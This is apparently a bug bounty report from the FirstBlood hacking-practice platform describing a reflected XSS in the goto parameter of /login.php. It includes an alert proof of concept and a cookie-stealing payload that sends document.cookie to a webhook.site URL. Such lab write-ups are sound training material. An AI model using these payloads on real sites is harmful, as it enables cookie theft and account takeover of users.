FirstBlood-#579 — Reflective XSS on /login.php?goto=
This issue was discovered on FirstBlood v2
On 2021-10-26, th4nu0x0 Level 2 reported:
Summary:
Hey, I have found a reflective cross-site scripting on /login.php?goto=
which has a potential of steal cookies which can lead to account takeover of higher privilege accounts when the user visits the malicious link.
Payload:
- Alerts 1:
"onmouseleave=confirm`1`//
- To Steal Cookies:
"onmouseleave="window.location.href=`https://webhook.site/ff9a5b6d-720c-4e25-8abf-656b645cbe74/${document.cookie}`"//
Steps To Reproduce:
- Visit https://your-instance.a.firstbloodhackers.com/login.php?goto="onmouseleave=confirm`1`//
- Move the mouse pointer down towards
Doctor Login
Impact:
An attacker use this vulnerability to inject malicious JavaScript and steal cookies of users.
P3 Medium
Endpoint: /login.php
Parameter: goto
Payload: "onmouseleave=confirm`1`//
FirstBlood ID: 26
Vulnerability Type: Reflective XSS
The developers thought they had fixed ?goto= when reflected in an input tag on login.php from a similar bug (
ID 39
), but because this endpoint uses legacy code their changes were not applied here and thus the XSS was forgotten.